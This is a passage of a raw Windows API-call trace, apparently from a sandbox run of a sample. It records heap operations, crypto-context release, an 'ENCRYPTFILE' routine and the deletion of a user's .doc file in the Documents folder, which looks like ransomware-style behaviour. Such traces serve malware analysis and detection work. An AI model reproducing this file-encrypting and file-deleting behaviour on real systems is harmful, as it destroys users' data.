hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.703] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0076.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0076.704] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.705] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.706] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0076.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.706] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.706] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0076.706] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.707] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.707] CloseHandle (hObject=0x298) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.707] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.708] CloseHandle (hObject=0x258) returned 1 [0076.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.710] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc", lpFilePart=0x0) returned 0x29 [0076.710] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ej z0zccpmn.doc")) returned 0x20 [0076.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0076.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.711] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceb43d90, ftCreationTime.dwHighDateTime=0x1d5e94d, ftLastAccessTime.dwLowDateTime=0x547f2530, ftLastAccessTime.dwHighDateTime=0x1d5e1fa, ftLastWriteTime.dwLowDateTime=0x547f2530, ftLastWriteTime.dwHighDateTime=0x1d5e1fa, nFileSizeHigh=0x0, nFileSizeLow=0xd46d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="eJ Z0ZcCpMN.doc", cAlternateFileName="EJZ0ZC~1.DOC")) returned 0x41ac200 [0076.711] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ej z0zccpmn.doc")) returned 1 [0076.715] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceb43d90, ftCreationTime.dwHighDateTime=0x1d5e94d, ftLastAccessTime.dwLowDateTime=0x547f2530, ftLastAccessTime.dwHighDateTime=0x1d5e1fa, ftLastWriteTime.dwLowDateTime=0x547f2530, ftLastWriteTime.dwHighDateTime=0x1d5e1fa, nFileSizeHigh=0x0, nFileSizeLow=0xd46d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="eJ Z0ZcCpMN.doc", cAlternateFileName="EJZ0ZC~1.DOC")) returned 0 [0076.715] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.715] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0076.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0076.716] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.716] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b476440, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0x6a510e20, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x6a510e20, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x6cbd, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="HD2UssJoRg1BYp.csv", cAlternateFileName="HD2USS~1.CSV")) returned 0x41ac140 [0076.716] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0076.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0076.717] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c08 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0076.717] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0076.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0076.718] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 